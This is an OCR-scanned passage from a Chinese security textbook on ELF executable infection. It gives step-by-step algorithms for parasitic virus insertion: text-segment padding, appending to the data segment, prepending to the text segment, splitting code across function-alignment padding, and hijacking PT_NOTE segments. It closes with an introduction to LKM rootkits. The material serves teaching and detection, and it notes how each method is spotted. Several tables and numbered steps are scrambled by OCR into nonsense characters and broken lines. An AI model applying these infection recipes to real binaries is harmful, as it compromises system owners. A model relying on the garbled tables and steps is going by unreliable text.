4.5.2 利用 ELF 格式 的 感染 方法 


与 ELF 格式 相关 的 感染 方法 , 比 4.5.1 节 的 感染 方法 要 复杂 很 多 ,需要 根据 ELF 格式 
来 改变 ELF 格式 内 容 , 从 而 使 病毒 代码 和 宿主 代码 共存 ,并 且 病 毒 代 码 执行 结束 后 能 顺利 
交接 控制 权 给 宿主 。 向 ELF 文件 中 插入 寄生 病毒 代码 要 求 宿主 文件 和 病毒 体 都 是 完整 的 ， 
因此 插入 的 病毒 代码 会 造成 段 的 使 用 大 小 增加 。 

理论 上 ELF 规范 非常 自由 。 节 和 有 段 的 位 置 .内 容 以 及 顺序 都 没有 被 限制 。 但 事实 上 一 
个 操作 系统 只 使 用 一 种 程序 加 载 器 .一 种 连接 器 和 很 少 的 几 种 编译 器 。 这 使 得 病毒 编写 工 
作 更 加 简单 。 我 们 可 以 使 用 事实 上 的 标准 , 那 只 是 ELF 标准 的 一 个 子 集 。 在 典型 的 操作 系 
统 中 ,只 有 很 少 一 部 分 的 程序 才 会 违反 这 些 事 实 上 的 标准 。 所 以 忽略 那些 违反 标准 的 程序 ， 
并 不 会 降低 病毒 生存 的 机 会 。 

所 有 对 执行 程序 必要 的 信息 , 即 ELF 头 以 及 程序 头 表 都 会 塞 进 第 一 个 页 面 ( 在 i386 上 
是 0x1000) ,可 能 是 为 了 简化 一 个 操作 系统 中 可 执行 文件 格式 检测 器 的 设计 。 动 态 链接 执 
行 需 要 的 头 比 静态 执行 要 多 一 点 ,这 是 因为 动态 链接 执行 所 需要 的 特殊 节 和 段 的 原因 。 在 
任何 情况 下 ,文本 段 的 程序 头 后 面 接着 数据 段 的 程序 头 。 静 态 执 行 的 文本 段 在 0 号 索引 的 
位 置 。 动 态 链接 可 执行 部 分 在 2 号 索引 位 置 。 

一 般 情况 下 ,一 个 进程 映像 至 少 包 含 一 个 文本 段 (Text Segment) 和 一 个 数据 段 (Data 
Segment) ,这 两 个 段 的 类 型 都 是 PT_LOAD, 并 且 具 有 不 同 的 权限 ,文本 段 具有 可 执行 权 
限 ,但 不 具有 可 写 权 限 。 数 据 段 具有 可 读 写 权限 ,默认 可 执行 。 一 个 目标 文件 中 的 段 通常 包 
含 一 个 或 者 多 个 节 。 通 常情 况 下 , 段 的 内 容 、 段 中 节 的 顺序 和 成 员 可 能 会 有 所 不 同 ,并 且 处 
理 器 的 不 同 也 会 影响 段 的 内 容 。 

文本 段 包含 只 读 的 指令 和 数据 ,包含 的 内 容 还 有 ELF 头 以 及 一 些 动态 链接 信息 。 通 常 
包括 以 下 各 节 ,文本 段 是 可 加 载 的 段 , 如 表 4-1 所 示 。 

数据 段 包括 可 写 的 指令 和 数据 ,包含 以 下 的 一 些 节 ,同样 也 是 可 加 载 的 段 ,如 表 4-2 所 示 。 
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表 4-1 文本 段 常见 内 容 表 4-2 数据 段 的 常见 内 容 
节 注 释 节 注 释 
. text 可 执行 指令 
0 | 天 读数 尖 .data 初始 化 了 的 数据 
. hash 符号 哈 希 表 .dynamic 动态 链接 信息 
. dynsym | 动态 链接 符号 表 
.dynstr | 用 于 动态 链接 的 字符 和 守 忆 公交 才 
.Plt 过 程 链接 表 (procedure linkage table) b 将 出 现在 程序 内 存 影 像 中 的 未 初 
» Dss 
.rel. got | . got 的 重 定位 信息 始 化 数据 


由 于 文本 段 具 有 的 内 存 访问 权限 为 r_x, 即 只 读 可 执行 权限 ,因此 很 显然 修改 的 病毒 体 
代码 不 能 够 直接 在 文本 段 中 使 用 ,数据 段 的 权限 是 rw_。 内 存 映像 中 的 段 并 没有 完全 用 到 
所 有 的 内 存 , 段 的 结尾 处 很 少 完全 占 到 一 个 页 面 的 边界 处 。 系 统 对 这 些 空隙 使 用 填充 来 完 
成 。 并 且 两 个 段 之 间 也 存在 空隙, 数据 段 经 常 紧 接着 文本 段 ,文本 段 的 开始 处 通常 在 一 个 页 
面 的 开始 处 ,但 数据 段 起 始 地 址 并 不 一 定 由 页 面 开始 处 开始 。 在 x86 架构 中 ,数据 段 需要 足 
够 多 的 内 存 空 间 来 增长 ,如 . bss 这 一 类 的 不 占 文件 空间 却 占 内 存 空间 的 节 , 因 此 栈 一 般 放 
在 内 存 的 顶端 ,向 下 增长 。 简 化 情况 下 ,两 个 段 之 间 的 填充 空间 如 表 4-3 所 示 。 

表 4-3 文本 段 .数据 段 之 间 的 填充 区 


段 页 号 页 内 内 容 注 释 
N TUUTTEITITETNIEITETLLT 
文本 段 T: 文本 段 代 码 
N 十 1 TITTTIITTTTITTITILTTTEEECEP P, 填充 代码 
数据 自 N+2 PPPPPPDDDDDDDDDDDDDD 数据 段 代码 
N+3 DDDDDDDDDDDDDDDDDDD 


一 个 简单 的 ELF 文件 格式 可 以 简化 成 如 表 4-4 所 示 。 
表 4-4 ELF 文件 简化 格式 


段 注 释 段 注 释 
ELF Header ELF 头 Segment2( 数 据 段 ) 数据 段 
Program header table 程序 头 表 Section header table 节 头 表 
Segmentl( 文 本 段 ) 文本 段 Extra sections 附加 节 


感染 ELF 文件 便 可 以 利用 这 些 填充 区 ,或 者 其 他 的 填充 区 ,如 函数 对 齐 的 填充 区 ,尽管 
很 小 ,但 数目 很 多 .也 是 可 以 利用 的 。 另 外 一 种 思路 便 是 利用 一 些 节 , 扩 展 或 者 蔡 代 这 些 
节 , 将 病毒 代码 放 入 其 中 ,例如 ,对 可 执行 文件 执行 时 关系 不 大 的 . note 节 便 可 以 成 为 利 
用 的 对 象 。 当 然 ,熟悉 ELF 格式 的 人 会 发 现在 ELF 文件 中 存在 很 多 种 途径 可 以 被 病毒 
体 利用 。 

下 面 详细 介绍 的 内 容 中 ,前 四 部 分 全 部 是 利用 填充 区 进行 病毒 感染 的 ,后 面 介 绍 利用 
. note 节 和 系统 调用 劫持 方法 进行 的 感染 算法 。 

1. 文本 段 之 后 填充 

这 种 方法 最 初 来 源 于 Silvio Cesare 的 经 典 文章 ,这 个 UNIX 病毒 研究 的 莫 基 者 在 他 的 
两 篇 文章 中 都 提 到 了 他 利用 这 种 方法 感染 的 VIT 病毒 ,可 以 说 这 是 相关 ELF 感染 中 较为 
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常用 的 方法 。 

Silvio Cesare 在 他 的 文章 UNIX ELF parasites and virus 和 UNIX viruses 中 分 别 对 
这 种 感染 方法 进行 描述 ,并 且 总 结 出 极为 精 悍 的 具体 实现 方法 。 

这 种 ELF 感染 方法 是 利用 在 可 以 提供 合适 的 承载 空间 的 文本 段 的 末尾 进行 页 面 填充 
的 方法 。 

在 ELF 文件 中 ,每 一 个 段 都 有 一 个 虚拟 地 址 与 它 的 起 始 位 置 相关 联 。 绝 对 代码 提 及 每 
个 段 是 允许 并 且 可 能 的 。 在 段 边缘 进行 页 面 填充 为 尺寸 合适 的 寄生 代码 提供 一 个 实用 的 位 
置 。 这 个 空间 不 会 影响 原来 的 段 , 没 有 要 求 重新 定位 。 下 面 介绍 选择 文本 段 末 尾 进 行 填充 。 
对 于 ELF 文件 感染 ,在 文本 段 末 尾 进 行 填充 是 一 个 可 行 的 解决 办 法 。 

在 未 感染 之 前 ELF 文件 结构 类 如 表 4-4 所 示 。 下 面 的 节 被 称 为 额外 的 节 , 这 些 额 外 的 
节 ( 不 属于 任何 一 个 段 ) 是 调试 信息 ,符号 表 等 这 些 信 息 。 一 个 段 头 表 告 诉 系统 如 何 建 立 进 
程 镜像 。 用 来 建立 进程 镜像 的 文件 (执行 一 个 程序 ) 必 须 有 一 个 段 表 , 重 定位 文件 则 不 需要 。 
一 个 节 头 表 包 含 描述 文件 节 的 信息 。 每 一 节 都 在 这 个 表 中 有 一 个 人 口 表 项 。 每 一 个 人 口 表 
项 提供 了 类 似 节 名 字 节 大 小 这 样 的 信息 。 文 件 链接 时 必须 有 一 个 节 表 头 ,其 他 的 可 执行 目 
标 文件 和 可 重 定位 文件 可 有 可 无 。 

一 个 ELF 目标 文件 可 能 会 指定 程序 入 口 地 址 ,控制 程序 的 虚拟 内 存 地 址 。 因 此 激活 感 
染 代 码 ,程序 流 必须 包含 新 的 感染 代码 。 这 可 以 通过 修改 入 口 地 址 在 ELF 中 直接 指向 寄生 
代码 ,然后 寄生 代码 需要 负责 让 源 文件 代码 执行 一 一 基本 上 就 是 当 寄 生 代 码 执行 完 之 后 将 
程序 控制 权 交 回 源 代码 。 具 体 算法 描述 如 下 。 

(1) 在 文本 段 末 尾 插入 代码 有 以 下 几 件 事 需要 做 。 

@ 增加 ELF header 中 的 p_shoff 以 包含 新 代码 。 

@ 定位 text segment program header, 增 加 p_filesz 算 和 人 新 代码 ; 增加 p_memsz 算 入 
新 代码 。 

@ 对 于 文本 段 phdr 之 后 的 其 他 phdr 修正 p_offset。 

由 对 于 那些 因 插 入 寄生 代码 影响 偏 移 的 每 节 的 shdr 修正 sh_offset。 

@ 在 文件 中 物理 地 插入 寄生 代码 到 这 个 位 置 。 

(2) 根据 ELF 规范 ,p_vaddr 和 p_offset 在 phdr 中 必须 与 模 page size 相等 。 


p_vaddr (mod PAGE SIZE) = p_offset (mod PAGE SIZE) 


意味 着 任何 文本 段 后 面 插入 的 代码 都 要 等 于 模 page size。 这 并 不 表示 文本 段 只 能 以 这 
个 数值 增 大 ,只 是 物理 文件 需要 这 样 而 已 。 

一 个 完整 的 页 必须 在 填充 中 使 用 ,因为 要 求 的 vaddr 不 可 用 。 

进程 镜像 加 载 新 的 代码 并 且 在 源 文件 代码 之 前 执行 新 代码 是 一 件 很 容易 的 事 , 只 要 
改 ELF 头 中 的 entry point 并 使 病毒 跳 转 到 原 人 口 地址 。 

新 的 入 口 地 址 由 文本 段 p_vaddr 十 p_filesz( 源 文件 ) 决 定 。 所 有 这 些 完成 后 ,新 代码 连 
接 到 原 主 体 段 ,然后 完成 感染 代码 。 

尽管 编程 很 完美 ,但 新 代码 加 在 文本 段 后 仍然 会 引起 怀疑 ,因为 这 段 代码 不 属于 任何 一 
个 节 。 扩 展 和 人 口 点 关联 的 节 很 容易 ,但 文本 段 最 后 一 节 仍 然 会 引起 怀疑 。 将 新 代码 关联 到 
一 个 节 上 必须 要 完成 ,因为 像 strip 这 样 的 程序 使 用 的 是 节 表 ,而 不 是 段 表 。 


NS 
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寄生 如 上 述 算法 所 描述 的 那样 ,感染 病毒 的 实现 并 不 成 问题 。 跳 过 不 具有 足够 填充 空 


间 的 可 执行 文件 ,可 以 被 简单 地 解决 。 也 可 以 存在 多 次 感染 ,但 被 感染 的 次 数 受到 寄生 代码 
尺寸 的 限制 。 简 单 地 说 ,尺寸 越 大 的 病毒 能 够 感染 的 可 执行 文件 越 少 。 


根据 本 节 的 算法 ,寄生 代码 插入 后 ,ELF 文件 的 布局 如 表 4-5 所 示 。 


表 4-5 文本 段 后 填充 感染 


段 注 释 
ELF header ELF 头 
Program header table 程序 头 表 
Segmentl 宿主 文本 段 
寄生 代码 寄生 代码 (恶意 代码 ) 
Segment2 数据 段 
Section header table 节 头 表 
Extra sections 附加 表 
利用 表 4-6 来 描述 ,如 表 4-6 所 示 。 
表 4-6 文本 段 后 填充 感染 后 的 段 间 布局 
段 页 号 页 内 内 容 注 释 
N TITTTITTITTITIPTTTITIIT 
文本 段 到 二 了 TELEETRETTIILYYYY ~ ed 最 
N+2 VVVPPPPPPPPPPPPPPPPPPPP 二 病毒 代码 
数据 段 N+3 PPPPPPDDDDDDDDDDDDDD D . 数据 段 代码 
N+4 DDDDDDDDDDDDDDDDDDD 
最 终 算法 描述 如 下 。 


(1) 增加 ELF header 中 的 e_shoff 增 大 PAGESIZE 大 小 。 
(2) 修正 插入 代码 使 其 能 够 跳 转 到 原 主体 代码 的 入 口 点 。 
(3) 定位 文本 段 程序 头 : 修改 ELF 头 的 入 口 点 地 址 指向 新 的 入 口 点 (p_vaddr 十 
p_filesz); 增加 p_filesz 包含 新 代码 。 
(4) 增加 p_memsz 包含 新 代码 。 
(5) 对 于 文本 段 最 后 一 节 的 shdr: 增 大 sh_size 加 上 寄生 代码 的 大 小 。 


(6) 对 了 
(7) 对 了 


PAGESIZE 大 小 。 
(8) 在 文件 中 物理 地 插入 寄生 代码 ,并 且 填 充 到 一 个 页 大 小 。 位 置 处 于 文本 段 的 
p_offset 加 上 原来 的 p_filesz 的 偏 移 位 置 。 


这 里 需要 注意 ,有 些 段 的 起 始 地 址 位 了 


F 文 本 段 之 后 的 phdr: 增加 p_offset 加 上 PAGESIZE 大 小 。 
F 那 些 因 插入 寄生 代码 而 影响 偏 移 的 每 个 节 的 shdr: 增加 sh_offset 加 上 


F 文 本 段 的 结尾 之 前 .但 在 程序 头 表 中 排序 在 文本 


段 之 后 ,对 于 这 样 的 段 程序 头 ,根据 代码 实现 会 被 发 现 也 会 被 改变 ,如 NOTE 段 ,但 并 没有 
影响 最 终 感染 结果 的 实现 。 因 为 这 一 类 的 段 并 没有 在 程序 运行 中 起 到 某 些 关键 作用 。 因 此 
可 以 忽略 这 个 问题 。 

另 一 个 要 注意 的 问题 就 是 病毒 大 小 与 可 执行 文件 的 关系 , 当 可 执行 文件 中 文本 段 最 后 
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一 个 内 存 页 中 填充 的 空间 与 数据 段 第 一 个 页 的 填充 空间 的 和 小 于 病毒 的 大 小 时 将 不 能 进行 
感染 ,原因 是 数据 段 和 文本 段 之 间 在 内 存 中 的 对 齐 填充 是 一 个 页 面 大 小 ,但 是 在 文件 中 两 个 
段 之 间 是 没有 这 个 页 面 大 小 的 间隔 的 ,是 紧 挨 着 的 ,所 以 可 以 在 文件 中 的 这 两 者 之 间 插 入 一 
个 页 面 大 小 ,但 是 病毒 的 大 小 却 不 能 超过 前 述 的 范围 ,一 旦 超过 导致 的 后 果 就 是 病毒 进入 了 
数据 段 与 文本 段 定义 的 填充 对 齐 页 ,从 而 便 会 导致 病毒 超过 部 分 无 法 执行 ,结果 导致 严重 的 
段 错误 (Segmentation Fault) 。 


2. 数据 段 之 后 插入 感染 


扩展 数据 段 也 是 可 行 的 ,但 并 不 建议 这 样 做 。 因 为 有 些 实施 内 存 保护 的 UNIX 中 数据 
段 是 不 可 执行 的 。 

在 数据 段 默认 可 执行 的 UNIX 系统 中 ,向 数据 段 之 后 填充 病毒 是 可 以 实现 的 。 通 过 扩 
展 数据 段 包 含 进 插 和 人 的 寄生 代码 来 感染 文件 。 

要 扩展 数据 段 意味 着 必须 对 程序 头 表 和 ELF 头 进行 修改 ,才能 使 ELF 可 执行 文件 以 
及 病毒 体 都 能 够 正常 执行 。 需 要 注意 的 是 ,. bss 节 通 常 是 数据 段 的 最 后 一 节 , 正 常 的 情况 
下 这 个 节 用 来 结束 数据 段 ,在 这 个 节 中 用 来 存放 未 初始 化 的 数据 ,并 且 不 占有 文件 空间 ,但 
却 占 有 内 存 空间 的 特殊 节 。 如 果 需 要 扩充 数据 段 , 必 须 留 下 足够 的 空间 给 . bss 节 。 因 此 ， 
在 定义 新 的 病毒 体 插入 点 时 ,应 该 插入 的 位 置 是 数据 段 的 (p_vaddr 十 p_memsz) 而 不 是 
p_vaddr 十 p_filesz)。 感 染 后 的 内 存 映 像 如 表 4-7 所 示 。 


表 4-7 数据 段 后 插入 寄生 代码 后 的 文件 映像 


段 注 释 
ELF header ELF 头 
Program header table 程序 头 表 
Segmentl 段 1 
Segment2 宿主 数据 段 
寄生 代码 寄生 代码 (恶意 代码 ) 
Section header table 节 头 表 
Extra sections 附加 节 


这 里 举例 介绍 这 种 感染 方法 ,使 用 的 例子 是 可 执行 文件 df。 

插入 点 后 面 的 内 容 就 是 两 个 不 属于 任何 段 的 节 252 字 节 ,以 及 节 头 表 1120 字 节 ,加 在 
一 起 正好 是 1372 字 节 , 即 文件 大 小 减 去 数据 段 偏 移 再 减 去 数据 段 文件 占有 大 小 的 值 。 即 数 
据 段 后 面 已 经 没有 其 他 的 段 了 ,因此 可 以 不 用 管 下 面 的 第 4 步 。 

根据 上 面 的 分 析 ,现在 算法 比较 明朗 了 。 

具体 的 实现 算法 如 下 。 

(1) 修改 病毒 代码 ,使 病毒 代码 执行 后 能 够 跳 转 到 原来 的 入 口 点 。 

(2) 定位 数据 段 : 修改 ELF 头 中 的 入 口 点 ,指向 新 的 代码 , 即 数据 段 末 尾 处 (p_vaddr 十 
p_memsz); 修改 e_shoff 字段 指向 新 的 节 头 表 偏 移 量 , 即 原来 的 加 上 加 入 的 病毒 大 小 和 bss 
段 大 小 。 

(3) 对 于 数据 段 程序 头 : 增加 p_filesz 用 来 包括 新 的 代码 和 . bss 节 ; 增加 p_memsz 包 
含 新 的 代码 ; 计算 . bss 节 的 大 小 (p_memsz 一 p_filesz)。 
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(4) 对 于 任何 一 个 插入 点 后 节 的 节 头 shdr: 增加 sh_offset, 增 加 数值 为 病毒 大 小 与 
.bss 节 大 小 的 和 。 

(5) 物理 地 插入 病毒 代码 到 文件 中 : 移动 节 头 表 以 及 其 他 两 个 不 属于 任何 段 的 节 。 

读者 可 以 根据 上 述 算法 的 描述 进行 编程 实验 。 感 染 过 程 以 及 感染 前 后 的 变化 可 以 通过 
readelf 工具 观察 。 本 算法 进行 数据 段 感染 成 功 的 前 提 是 数据 段 的 代码 具有 默认 可 执行 权 
限 , 要 求 数据 段 内 代码 可 执行 ,一般 数据 段 的 权限 是 RW( 可 读 可 写 ) ,有 些 操作 系统 默认 可 
执行 ,有 些 则 不 是 。 

在 某 些 规定 数据 段 的 代码 是 不 可 执行 的 操作 系统 上 时 ,该 病毒 体 代码 是 没有 办 法 成 功 
执行 的 ,因此 在 这 一 类 操作 系统 中 是 无 法 进行 本 类 感染 的 。 但 可 以 考虑 实现 在 文本 段 后 以 
填充 方法 进行 感染 。 

通过 实例 来 解释 分 析 感 染 过 程 。 

这 个 算法 在 FC6 系统 上 实现 时 ,感染 过 的 ELF 可 执行 文件 虽然 经 过 strip 后 仍然 不 会 
改变 大 小 ,但 是 strip 命令 执行 时 会 报 一 个 错误 , 且 没 有 解决 这 个 错误 的 方法 。 

这 样 的 算法 可 以 在 某 些 操作 系统 上 的 ELF 文件 上 实现 ,但 是 被 感染 后 的 文件 是 存在 前 
面 简单 感染 方法 中 讲述 的 strip 问题 的 ,因为 用 strip 命令 检测 这 个 被 感染 文件 会 把 所 有 没 
有 属于 任何 节 的 病毒 代码 都 删除 ,会 导致 程序 执行 错误 。 解 决 这 个 问题 的 方法 是 可 以 建立 
一 个 新 的 节 , 但 同时 会 造成 其 他 的 问题 ,需要 修改 很 多 地 方 来 实现 。 

综 上 所 述 ,这 类 病毒 不 仅 适 用 范围 相对 比较 窗 ,而 且 检 测 很 容易 ,只 需要 strip 命令 或 者 
只 要 查看 一 下 ELF 头 中 的 入 口 点 是 否 正 常 指向 , 即 入 口 点 是 否 指向 文本 段 中 的 内 容 就 可 以 
检测 到 。 该 算法 实现 的 复杂 度 与 前 面 讲述 的 文本 段 填充 相当 ,安全 性 与 无 关 ELF 感染 方法 
差不多 ,所 以 实现 这 类 的 病毒 得 不 偿 失 ,只 是 一 种 探索 的 方向 而 已 。 或 许 在 技术 和 ELF 格 
式 有 所 发 展 的 时 候 ,这 种 类 似 思路 的 感染 方法 会 有 所 应 用 ,目前 的 状态 不 太 可 能 存在 这 类 病 
毒 产 生 的 可 能 性 。 

3. 文本 段 之 前 插入 感染 


可 以 考虑 在 文本 段 前 部 植 和 人 病毒 体 , 这 样 修改 后 的 程序 人 口 点 依旧 在 文本 段 ,而 不 是 数 
据 段 。 

新 的 文本 段 病毒 感染 方法 是 将 文本 段 向 低地 址 扩展 ,并 且 使 病毒 代码 在 扩展 的 空间 内 
执行 。 感 染 后 的 文件 映像 如 表 4-8 所 示 。 


表 4-8 文本 段 前 插入 寄生 代码 后 的 文件 映像 


段 注 释 

ELF header ELF 头 

Program header table 程序 头 表 

寄生 代码 寄生 代码 (恶意 代码 ) 
Segmentl( 文 本 段 ) 文本 段 

Segment2( 数 据 段 ) 数据 段 

Section header table 节 头 表 

Extra sections 附加 节 
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文本 段 之 前 的 感染 方法 就 是 简单 地 向 文本 段 前 部 区 域 插 入 病毒 代码 ,ELF 头 以 及 程序 
头 表 必 须 复制 到 新 的 被 感染 的 文件 的 首部 。 然 后 紧 随 其 后 的 是 病毒 体 代 码 , 最 后 才 是 原文 
件 的 内 容 。 

对 于 插入 的 病毒 体 代 码 必 须要 有 一 个 节 来 包含 这 些 代码 ,否则 会 被 strip 程序 处 理 掉 ， 
所 以 可 以 选择 创建 一 个 新 节 或 者 扩展 文本 段 中 的 某 一 节 来 包含 这 部 分 代码 ,但 这 两 种 方法 
实现 结束 后 都 比较 容易 被 发 现 。 总 之 ,这 种 感染 方法 实现 难度 大 ,并 且 被 发 现 的 概率 大 , 因 
此 与 前 面 两 种 方法 做 比较 ,本 课题 的 病毒 实现 部 分 选择 前 面 两 个 作为 病毒 感染 方法 来 演示 。 

具体 算法 描述 如 下 。 

(1) 修改 病毒 代码 使 病毒 代码 能 够 执行 完 后 跳 转 到 原来 的 入 口 地 址 。 

(2) 修正 ELF 头 中 的 e_shoff 来 包含 新 的 代码 。 

(3) 定位 文本 段 : 修正 文本 段 p_ memsz 和 P_filesz, 增 大 PAGESIZE 大 小 ; 修正 该 程序 
头 的 p_vaddr p_paddr。 

(4) 对 任何 插入 点 之 后 的 段 的 程序 头 phdr: 增加 p_offset 来 算 入 新 的 代码 ; 还 应 修改 
p_vaddr 和 p_paddr 与 偏 移 成 模 运 算 关系 。 

(5) 对 任何 插入 点 之 后 的 节 的 节 头 shdr: 增加 sh_offset 来 算 入 新 的 代码 。 

(6) 物理 地 插入 病毒 代码 到 文件 中 ,填充 到 PAGESIZE 大 小 ,将 病毒 体 及 填充 插 在 
ELF 头 和 程序 头 表 之 后 的 区 域 。 

4. 利用 函数 对 齐 填充 区 感染 

下 面 的 内 容 是 关于 利用 函数 填充 区 的 感染 方法 。 主 要 参考 Hermlt 的 文章 Infecting 
ELF— Files using function padding for Linuz, 以 及 Ares 的 文章 Static linked ELF 
infecting ,在 第 一 篇 文章 中 ,Hermlt 介绍 了 一 种 利用 为 了 函数 对 齐 而 填充 的 小 块 区 域 来 感 
染病 毒 的 方法 。 

函数 对 齐 与 页 面 对 齐 的 目的 一 样 ,都 是 为 了 提高 代码 的 性 能 才 采 取 的 措施 。 在 许多 架 
构 中 ,函数 首部 也 做 对 齐 处 理 , 尤 其 当 gee 使 用 -02 及 其 以 上 优化 开关 的 时 候 , 所 以 函数 首 
部 前 面 有 部 分 填充 区 可 利用 。 

我 们 所 关注 的 是 代码 中 的 对 齐 是 如 何 实现 的 。 在 一 些 简单 的 函数 中 存在 的 对 齐 有 数 个 
字 节 。 这 部 分 空间 可 以 用 来 插入 自己 的 代码 。 但 是 不 同 程序 中 函数 的 填充 空间 大 小 是 由 多 
种 因素 决定 的 ,如 编译 器 、 编 译 时 的 选项 ,以 及 操作 系统 结构 等 。 利 用 函数 填充 区 感染 病毒 
的 原理 是 由 于 函数 填充 区 一 般 较 小 ,需要 将 病毒 分 割 成 几 个 段 , 修 改 每 段 最 后 部 分 :添加 跳 
转 语句, 将 病毒 各 个 段 分 别 放 进 不 同 的 函数 填充 区 内 ,然后 类 似 于 前 面 几 种 感染 方法 ,修改 
ELF 文件 头 中 的 入 口 点 地 址 ,指向 病毒 人 口 点 ,并 使 病毒 最 后 一 段 执 行 结束 后 能 够 跳 转 到 
原来 的 宿主 程序 人 口 点 。 因 此 ,这 种 方法 并 不 需要 像 页 面 填充 那样 修改 节 以 及 段 的 程序 头 ， 
但 是 这 种 感染 方法 最 麻烦 的 地 方 在 于 需要 修改 和 分 割 病毒 代码 ,而 对 这 些 代码 ,修改 的 不 是 
像 程序 头 和 节 头 那样 的 C 数据 结构 而 是 二 进 制 的 代码 ,一 般 使 用 内 嵌 汇 编 方 式 或 者 直接 在 
C 语言 中 进行 计算 机 语言 代码 查找 替换 操作 实现 这 种 修改 ,更 加 复杂 烦琐 。 

其 他 的 相关 问题 是 对 于 函数 填充 区 的 空间 大 小 也 是 有 限制 的 ,必须 能 足够 容纳 一 条 跳 
转 语句 (jmp ) ,并 且 对 填充 空间 的 查找 也 是 需要 对 模式 匹配 以 及 对 函数 二 进 制 代 码 特 性 的 
了 解 。 在 二 进 制 代码 中 定位 一 块 大 于 X 字 节 的 函数 对 其 填充 区 的 确 比较 困难 ,并 且 将 病毒 
代码 按 需要 分 段 修改 再 链接 起 来 也 是 相当 费时 的 事情 。 所 以 这 类 病毒 效率 比较 低 ,编程 难 
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度 也 比较 大 。 

在 文本 段 中 ,病毒 被 放置 在 某 些 函数 末尾 的 填充 区 内 ,通常 情况 下 ,静态 链接 的 libc 函 
数 更 有 可 能 成 为 这 一 类 的 目标 ,因为 这 种 函数 多 数 都 有 能 够 比较 容易 检测 到 的 标识 (如 系统 
调用 ) ,并 且 填 充 区 相对 比较 大 。 

具体 感染 算法 如 下 。 

(1) 从 当前 进程 中 取出 病毒 代码 ,查找 合适 的 未 被 感染 的 ELF 可 执行 文件 作为 宿主 文 
件 , 并 修改 病毒 体 ,使 其 执行 完 后 能 够 跳 转 至 宿主 文件 代码 入 口 点 。 

(2) 查找 宿主 文件 函数 填充 区 ,找到 足够 大 的 函数 填充 区 并 记录 。 

(3) 将 病毒 体 分 割 。 

(4) 将 分 割 后 的 病毒 放 入 宿主 文件 多 个 函数 填充 区 内 ,并 在 每 一 块 后 设置 跳 转 指令 ,使 
其 各 部 分 相连 接 。 

(5) 修订 入 口 点 ,使 其 指向 病毒 体 入 口 点 。 

5. 利用 NOTE 段 或 者 扩展 . note 节 

利用 PT_NOTE 类 型 的 段 来 进行 的 病毒 感染 方法 主要 参考 Alexander Bartolich 写 的 
The ELF Virus Writing HOWTO 中 关于 利用 NOTE 段 的 内 容 以 及 Hermlt 所 写 的 病毒 
adhoca 源码 。 

向 一 个 ELF 可 执行 文件 中 插入 第 二 个 可 执行 的 文本 段 将 是 一 种 感染 方法 。 但 是 第 二 
个 文本 段 需 要 使 用 一 个 已 经 存在 的 程序 头 , 因 为 插入 新 的 程序 头 需 要 做 的 改动 将 大 大 增加 
被 发 现 的 可 能 性 。 经 过 查找 发 现 类 型 为 NOTE 的 段 的 程序 头 可 以 被 替换 掉 。 这 种 方法 的 
好 处 显而易见 , 插 和 人 的 病毒 代码 不 受 空 间 的 影响 但 是 很 容易 被 检测 到 。 因 为 这 种 感染 方法 
会 造成 普通 的 ELF 可 执行 文件 中 出 现 3 个 LOAD 类 型 的 段 ,而 不 是 正常 情况 下 的 两 个 。 

在 ELF 文档 中 对 PT_NOTE 类 型 的 段 以 及 SHT_NOTE 类 型 的 节 的 描述 为 : 类 型 为 
SHT_NOTE 和 PT_NOTE 的 节 区 可 以 用 作 特 殊 信息 的 存放 。 节 区 和 程序 头 部 中 的 注释 信 
息 可 以 有 任意 多 个 条 目 ,每 个 条 目 都 是 一 个 按 目 标 处 理 器 格式 给 出 的 4 字 节 的 数组 。 

通过 利用 这 个 段 ,将 其 修改 为 PT_LOAD 类 型 便 可 以 达到 加 载 到 内 存 中 并 执行 的 效果 。 

简单 算法 描述 : 查找 文件 中 的 PT_NOTE 类 型 的 段 ,修改 PT_NOTE 类 型 段 程序 头 中 
的 字段 ,重点 字段 需要 修改 p_type 为 PT_LOAD. 并 将 其 他 字段 修改 为 合适 的 值 ,然后 将 
ELF 头 中 的 e_entry 字段 修改 为 PT_NOTE 段 的 p_vaddr 值 ,即使 病毒 程序 先 于 宿主 程序 
执行 ,修改 病毒 程序 使 其 执行 结束 后 能 够 跳 转 到 原 入 口 地 址 。 然 后 插入 病毒 体 到 文本 段 中 
的 相应 位 置 。 

在 Hermlt 所 写 的 病毒 adhoca 中 实现 该 感染 方法 时 需要 用 到 1d 脚本 来 定位 病毒 体 起 
人 位 置 ,以 及 病毒 体 的 大 小 。 

另 一 种 利用 扩展 . note 节 的 感染 方法 是 通过 扩展 . note 节 来 包含 进 病毒 代码 的 ,从 而 达 
到 病毒 植 人 宿主 的 目的 而 不 被 strip 程序 发 现 。 这 种 方法 实现 时 同时 要 移动 . note 节 后 面 
的 各 个 节 以 及 节 头 表 。 但 是 这 种 方法 会 造成 . note 节 大 小 异常 ,从 而 很 容易 被 readelf 以 及 
objdump 一 类 的 工具 发 现 。 


4.5.3 高 级 感染 技术 
前 面 两 节 描述 的 感染 技术 最 多 只 能 感染 一 些 应 用 程序 ,因此 只 是 停留 在 感染 用 户 层次 
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上 的 可 执行 文件 , 若 上 升 到 内 核 层 次 就 需要 感染 内 核 的 模块 。 对 Linux 最 致命 的 病毒 攻击 
方式 就 是 感染 Linux 内 核 ,也 就 是 使 用 Linux 的 LKM。 

另外 一 种 用 户 层 次 上 的 高 级 感染 方法 是 通过 截获 PLT 或 者 GOT 表 来 实现 ,关于 这 两 
者 的 基础 知识 可 以 查看 本 文 第 2 章 相关 内 容 , 此 处 不 再 袭 述 。 

1. LKM 感染 技术 

LKM 就 是 Loadable Kernel Module, 直 译 就 是 可 加 载 内 核 模块 。 目 前 发 现 的 很 多 后 门 
程序 ,Rootkit 一 类 的 程序 都 是 使 用 LKM 作为 主要 攻击 手段 。LKM 在 Linux 操作 系统 中 
被 广泛 使 用 ,主要 的 原因 就 是 LKM 具有 相对 灵活 的 使 用 方式 和 强大 的 功能 ,可 以 被 动态 地 
加 载 ,而 不 需要 重新 编译 内 核 。 同 样 ,在 另 一 方面 , 它 对 于 病毒 而 言 , 也 有 很 多 好 处 ,如 隐藏 
文件 和 进程 等 ,但 是 使 用 LKM 是 比较 麻烦 的 ,需要 较 高 的 技术 要 求 。 

LKM 内 核 模块 也 属于 ELF 目标 文件 ,但 是 又 区 别 于 一 般 的 应 用 程序 ,属于 系统 级 别 的 
程序 ,用 来 扩展 Linux 内 核 功 能 。LKM 可 以 很 容易 地 动态 加 载 到 内 核 中 而 不 需要 重新 编 
